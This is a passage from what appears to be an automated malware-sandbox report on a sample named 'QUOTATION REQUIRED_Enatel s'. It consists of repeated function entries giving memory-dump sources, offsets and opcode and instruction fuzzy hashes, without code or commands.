                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a6892f7952545389f848d70e8fcf8b21786cfb32eaada1ff1ce194953d5c0ec6
                                                                                                                                              • Instruction ID: f79994d72f84bcdff5c6e147c8584c5e2e470af262755d1f41c29769763c60da
                                                                                                                                              • Opcode Fuzzy Hash: a6892f7952545389f848d70e8fcf8b21786cfb32eaada1ff1ce194953d5c0ec6
                                                                                                                                              • Instruction Fuzzy Hash: 74E0B871B001146BA704DAAA9C405AFBAEEDBC4995B10C1769505D7241EA30AD4147E0
                                                                                                                                              Function 04D396D8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cc82244b4858199e07925be60d45ade2054c1cb288c49624c5af8701d1e7b397
                                                                                                                                              • Instruction ID: a413c36434b42c445bf8b3299257970f368732a4f85870eda3e0f0a91a215ae5
                                                                                                                                              • Opcode Fuzzy Hash: cc82244b4858199e07925be60d45ade2054c1cb288c49624c5af8701d1e7b397
                                                                                                                                              • Instruction Fuzzy Hash: 94E0DF326043504BD211A67EF840A8BBB92EFC4210F04892FE0598B214EA70A94297D2
                                                                                                                                              Function 04D37F60 Relevance: .0, Instructions: 24COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 71a9f76f27b23358f5a18128223feb4a0d5a7a9acbbba37379f65d467294e879
                                                                                                                                              • Instruction ID: 2a449a773c6774fa7c44e4c4fcaa81bcd569728e6ca9d0a989259346d8890f42
                                                                                                                                              • Opcode Fuzzy Hash: 71a9f76f27b23358f5a18128223feb4a0d5a7a9acbbba37379f65d467294e879
                                                                                                                                              • Instruction Fuzzy Hash: 88E0D835A101198FCB00AA6DE8048DDBBB9EFC5221B01416AE50597310EB7099058BD1
                                                                                                                                              Function 0897B262 Relevance: .0, Instructions: 24COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9bae854e352fc535727be2cbd36c897eb2ba82f628cdcaceba0ac7f0d9be1c62
                                                                                                                                              • Instruction ID: ac9e6c3f6e394d21a66945a888fc36de9593427c20ef1ed36da17abe810ba6a3
                                                                                                                                              • Opcode Fuzzy Hash: 9bae854e352fc535727be2cbd36c897eb2ba82f628cdcaceba0ac7f0d9be1c62
                                                                                                                                              • Instruction Fuzzy Hash: C8E02636A02108EBCF007BB0A84E6AE7FACDF24236F048432EE05D6111E670C058C2A0
                                                                                                                                              Function 04D35FFB Relevance: .0, Instructions: 22COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eab5aa9f11d6605065a8ce41a3bad51e559273e547b603dc21b1a82209952222
                                                                                                                                              • Instruction ID: b9fe7b712ca800e2e68ed10cf0ce7a942f19004057050b1f615d25b7d6e1b7ab
                                                                                                                                              • Opcode Fuzzy Hash: eab5aa9f11d6605065a8ce41a3bad51e559273e547b603dc21b1a82209952222
                                                                                                                                              • Instruction Fuzzy Hash: 84E026747043809FF712FBA8A0803D937AAEB8020BB104057C402CB31AEB65ACC383C4
                                                                                                                                              Function 04D31F48 Relevance: .0, Instructions: 22COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 09bb7203712487c5b149793c172ea202f036b5e54225570aa1d8d1f9e5e2455c
                                                                                                                                              • Instruction ID: e0364066d2c619e40cb2216b4a63270f9932d92cf78fc422837b4768e9f49a6b
                                                                                                                                              • Opcode Fuzzy Hash: 09bb7203712487c5b149793c172ea202f036b5e54225570aa1d8d1f9e5e2455c
                                                                                                                                              • Instruction Fuzzy Hash: 9AF0ED71D08344DFE700EF64F90054C7BB1FB96324720868ED844972AAEB360F26CB46
                                                                                                                                              Function 0C380C43 Relevance: .0, Instructions: 21COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1638199905.000000000C380000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C380000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c380000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cc0711278489629cfa22f683fa203b9e05c09239bc77ed510c94b6bc86f48e73
                                                                                                                                              • Instruction ID: 0d9f5891aca19e39bc522d3cf80f65def7204041334ee933cd9c6acf3f615117
                                                                                                                                              • Opcode Fuzzy Hash: cc0711278489629cfa22f683fa203b9e05c09239bc77ed510c94b6bc86f48e73
                                                                                                                                              • Instruction Fuzzy Hash: B1E0CD70C0A39CAFC715ABB4AC119BE7FB49B43200F1041D6E84427252C6300F5CDBA2
                                                                                                                                              Function 04D36048 Relevance: .0, Instructions: 19COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9ded5948d1b1d941fd0adab7cf072d93b0c48d806150a1fd4ccd41edd562edc4
                                                                                                                                              • Instruction ID: 2aa64d01cfda20e8036db3722b7f1387c7c7163437a90f1cef4a68e5de24bd6d
                                                                                                                                              • Opcode Fuzzy Hash: 9ded5948d1b1d941fd0adab7cf072d93b0c48d806150a1fd4ccd41edd562edc4
                                                                                                                                              • Instruction Fuzzy Hash: 3AE01A34646381DFC76ADB38D0604157B62AB4231536585EED0A68B6A2CA36E891CB54
                                                                                                                                              Function 04D31F58 Relevance: .0, Instructions: 19COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f67d3e0f922f048e31a0cdf3edebe4c2a77088d55849a189857531a5b03056ac
                                                                                                                                              • Instruction ID: c3a48dd28a83506f5c7e360c83d792a8481ab4c5ee25325f891d87048037f5c8
                                                                                                                                              • Opcode Fuzzy Hash: f67d3e0f922f048e31a0cdf3edebe4c2a77088d55849a189857531a5b03056ac
                                                                                                                                              • Instruction Fuzzy Hash: 9DE08C31A00308EFDB00EFA4F904A5CBBB9FB84310B208599D808D3309DB366F14DB96
                                                                                                                                              Function 04D39F70 Relevance: .0, Instructions: 19COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 986b6fd7bbaccdc49fd123008d68318d258d3cf527647f673e5d77e85fa66631
                                                                                                                                              • Instruction ID: cd7f8f7d4954b85df7f620aa443ceeb78d2e4b36446a5f45127274d5ee362a27
                                                                                                                                              • Opcode Fuzzy Hash: 986b6fd7bbaccdc49fd123008d68318d258d3cf527647f673e5d77e85fa66631
                                                                                                                                              • Instruction Fuzzy Hash: BEE0C2352141589BC3018B79F40D9A97FE8DF4A620B18819FF84483322DA70CD14C780
                                                                                                                                              Function 04D384B8 Relevance: .0, Instructions: 18COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3d7e8c08628c7c06461cef5dd4235b58bac7d70ffae51986c1dbe9925e16713a
                                                                                                                                              • Instruction ID: 1713a8da01d2a5a4281a50eb686d2302502faf9f6f90c6e38528a6dae85f6a04
                                                                                                                                              • Opcode Fuzzy Hash: 3d7e8c08628c7c06461cef5dd4235b58bac7d70ffae51986c1dbe9925e16713a
                                                                                                                                              • Instruction Fuzzy Hash: 3FE086368057E08FD311BF98E689AA07BA1AF02326F464097F4949B456C735E8848B69
                                                                                                                                              Function 04D33F60 Relevance: .0, Instructions: 17COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ca6db88ececfc31cc8c78a69bfebccc86c3310bc0af0e2dea35baa42e4a8f681
                                                                                                                                              • Instruction ID: 2143b818e6faa4d5e771c1c9bc8e86ff09b14f658bc4f8563895bc0ab7663574
                                                                                                                                              • Opcode Fuzzy Hash: ca6db88ececfc31cc8c78a69bfebccc86c3310bc0af0e2dea35baa42e4a8f681
                                                                                                                                              • Instruction Fuzzy Hash: 0BE0CD20508B48DFC702BB78E10415DFF30DF52205F4205D5D8C4A7095DF760565C362
                                                                                                                                              Function 04D39F80 Relevance: .0, Instructions: 15COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cf0383f57ec18694adc7e8b7d860c687924350abf10392b3de6b2263316d1f6b
                                                                                                                                              • Instruction ID: f5ba42bf31698aa84ea9165417020d6ec115d4a7e491f60919cdd987aee9f125
                                                                                                                                              • Opcode Fuzzy Hash: cf0383f57ec18694adc7e8b7d860c687924350abf10392b3de6b2263316d1f6b
                                                                                                                                              • Instruction Fuzzy Hash: 2BD0C9363101289F87049B68E508CA97BE9EF4D6613158166F909C7361CE71DC108BD4
                                                                                                                                              Function 04D33F70 Relevance: .0, Instructions: 15COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7a4e332531f78095091d3169aaed971e50fd73a9faa9564b8d5214b03b899619
                                                                                                                                              • Instruction ID: 811dba1f006694429edcd7080c5c435e4f91b702466105d699d5558f131f097a
                                                                                                                                              • Opcode Fuzzy Hash: 7a4e332531f78095091d3169aaed971e50fd73a9faa9564b8d5214b03b899619
                                                                                                                                              • Instruction Fuzzy Hash: 72D0C961C04A0CA6DB01BBFCA54906DFF38EE81616F4106E5ECC471088EF7259B883A6
                                                                                                                                              Function 04D39568 Relevance: .0, Instructions: 14COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c90ff5341dfa3259e494fc3515a04a20e081076422e97bb567f3271eb6092599
                                                                                                                                              • Instruction ID: 56af1e7febad1dbbd262d0a6817ff0040caf4d5c661c66c033cd3fce0fd3cdf8
                                                                                                                                              • Opcode Fuzzy Hash: c90ff5341dfa3259e494fc3515a04a20e081076422e97bb567f3271eb6092599
                                                                                                                                              • Instruction Fuzzy Hash: 5ED0A737302144FEEB41AFE0D940F953F21AB04204F109045F6481E612C332D516DB10
                                                                                                                                              Function 04D3E9F8 Relevance: .0, Instructions: 13COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 73d29947e6a43e7385ed8af8c8a8f8e91b3ad9764e98c23f6aea1899ffc9a834
                                                                                                                                              • Instruction ID: 77fb5e321273560ba387c7b34c95522781085d93cd7f0d9a5eee5bf47e2bbb0a
                                                                                                                                              • Opcode Fuzzy Hash: 73d29947e6a43e7385ed8af8c8a8f8e91b3ad9764e98c23f6aea1899ffc9a834
                                                                                                                                              • Instruction Fuzzy Hash: F4D05E31008148ABC301CB71D449E807B64EB56210F008496E94407623C23699159740
                                                                                                                                              Function 04D376C3 Relevance: .0, Instructions: 12COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 54dfffe51d507c01135a302fc27dd11b0799a75cc4ddb615e0009239fe046564
                                                                                                                                              • Instruction ID: d392707dba29f19929f9a7d2ee79b33c4e7d089732fefa08ea22bfcb2ca3292a
                                                                                                                                              • Opcode Fuzzy Hash: 54dfffe51d507c01135a302fc27dd11b0799a75cc4ddb615e0009239fe046564
                                                                                                                                              • Instruction Fuzzy Hash: 5CD0A93A208244FFCB026B90CA90A5A7F22AF19309F08808AE3440D0A3C333E627E740
                                                                                                                                              Function 04D39578 Relevance: .0, Instructions: 11COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1e1315897758871a468a205bf2118c00cc62058d93a0a45e5ccb2a974e2a2972
                                                                                                                                              • Instruction ID: 7b19ca618387acb72bd2699e5265f773eda85f0467757cfbdbe79e98d9f59f40
                                                                                                                                              • Opcode Fuzzy Hash: 1e1315897758871a468a205bf2118c00cc62058d93a0a45e5ccb2a974e2a2972
                                                                                                                                              • Instruction Fuzzy Hash: 19C01236300208BFEA80AA94C840E567769AB08A14F909000BA084A201C272E8629BA0
                                                                                                                                              Function 04D3E9CE Relevance: .0, Instructions: 11COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 051f4dad50d965818926c479f4de2e7b12e7c971a1e86047b67a893119b13880
                                                                                                                                              • Instruction ID: aa479a2b8e5764cfe96fd5f6069cfc9bd77bd88c50068d730c1ab11f4952ebef
                                                                                                                                              • Opcode Fuzzy Hash: 051f4dad50d965818926c479f4de2e7b12e7c971a1e86047b67a893119b13880
                                                                                                                                              • Instruction Fuzzy Hash: 57C012B39285044DE240B564CC0134D7760EB75205F404125D18462104FA1092948792
                                                                                                                                              Function 04D376D0 Relevance: .0, Instructions: 10COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f635b49df520eddc9ab47631a8a42d2128c6193e7085329d90939bb2aa4ce790
                                                                                                                                              • Instruction ID: c2b3f8770d83cc3eb59b6d1309bed855c162a8fccc9ab82dc6e670e0a2c6ddde
                                                                                                                                              • Opcode Fuzzy Hash: f635b49df520eddc9ab47631a8a42d2128c6193e7085329d90939bb2aa4ce790
                                                                                                                                              • Instruction Fuzzy Hash: 94C08C3220010CBBCB027E80CD00E09BF2AFB04794F108004F7040D021D373E523ABD0
                                                                                                                                              Function 04D3B130 Relevance: .0, Instructions: 10COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6e36e40828bb54151dc096c63672e5de10aa6ef5bf553f7f7b84087f8c64179d
                                                                                                                                              • Instruction ID: 57f2b9c424ced05591c7d1c4c05665703def80c980b2ab805ad222b1cfbee186
                                                                                                                                              • Opcode Fuzzy Hash: 6e36e40828bb54151dc096c63672e5de10aa6ef5bf553f7f7b84087f8c64179d
                                                                                                                                              • Instruction Fuzzy Hash: 1CC08C93D0E3C02EF30722E008126A03F205F2360CF0B50C2C6C48A1E382A42A21C3B6
                                                                                                                                              Function 04D3C0D4 Relevance: .0, Instructions: 9COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8ce3380cdf97e7d4e489f796357fe9db9c22feb0a187a8b3286a302f36e05b2e
                                                                                                                                              • Instruction ID: 670bd615c417dbecf5ef85ef91d22a28502172b54135a5cf344cb2b2ae185e92
                                                                                                                                              • Opcode Fuzzy Hash: 8ce3380cdf97e7d4e489f796357fe9db9c22feb0a187a8b3286a302f36e05b2e
                                                                                                                                              • Instruction Fuzzy Hash: 50C09B372741049FD605EB90CD84D15FEA5FF95B46785DC53A28595030D731D81CFB26
                                                                                                                                              Function 04D3C910 Relevance: .0, Instructions: 9COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e2cf9becf1ae395904a7dd0f97555099adc312e85f722a28cf427b0e148bbec9
                                                                                                                                              • Instruction ID: 83e7f10a32a115222db063ae1e6a4f0d64ec04f75d5623670943b846a6f19a9e
                                                                                                                                              • Opcode Fuzzy Hash: e2cf9becf1ae395904a7dd0f97555099adc312e85f722a28cf427b0e148bbec9
                                                                                                                                              • Instruction Fuzzy Hash: 98C08C3711618059DB03D7F09D48A41BFF0FB29744F08C887E2C046032D630952CEB10
                                                                                                                                              Function 04D3EA08 Relevance: .0, Instructions: 9COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                                                              • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                                                                                                              • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                                                              • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                                                                                                              Function 04D399D8 Relevance: .0, Instructions: 8COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fdcac4086038425f8a5f734f3d18f0342eed85320848957f9bfb14a864d44221
                                                                                                                                              • Instruction ID: c1e04c36570879860f65dc99825a351d02a942c2918d58ddd3faeee60f2438ac
                                                                                                                                              • Opcode Fuzzy Hash: fdcac4086038425f8a5f734f3d18f0342eed85320848957f9bfb14a864d44221
                                                                                                                                              • Instruction Fuzzy Hash: 41B012B574430466F20032920C75B6B6851FBD1B0AF80DC57F2441008549E1F85467FB
                                                                                                                                              Function 04D3DB50 Relevance: .0, Instructions: 7COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4aa4e63747f8efc856918aedf2c880ee59f390d88babf39a444c449425944924
                                                                                                                                              • Instruction ID: 71e773d2817b93eb015e29a2e9e24b681d12447c1ca7db11545cc0585641009d
                                                                                                                                              • Opcode Fuzzy Hash: 4aa4e63747f8efc856918aedf2c880ee59f390d88babf39a444c449425944924
                                                                                                                                              • Instruction Fuzzy Hash: 6CB0120614A3C000FA0193F238453182D105343602F8E41C7C0440004355181008E351

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 0C381588 Relevance: .3, Instructions: 344COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1638199905.000000000C380000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C380000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c380000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3d2f4edcb563963b67ab893a71db169491fe0e7f0651ffe2d62a7c7a604e68ce
                                                                                                                                              • Instruction ID: 0cc077eb11526c72ce4b9cd02a128ff7e0ea29344c3817c00c97428de94d1b61
                                                                                                                                              • Opcode Fuzzy Hash: 3d2f4edcb563963b67ab893a71db169491fe0e7f0651ffe2d62a7c7a604e68ce
                                                                                                                                              • Instruction Fuzzy Hash: ECC1AB317113548FEB15EB76C460BAEB6F6AF89700F24446ED54ACB290DB34E90ACF91
                                                                                                                                              Function 06D085B0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
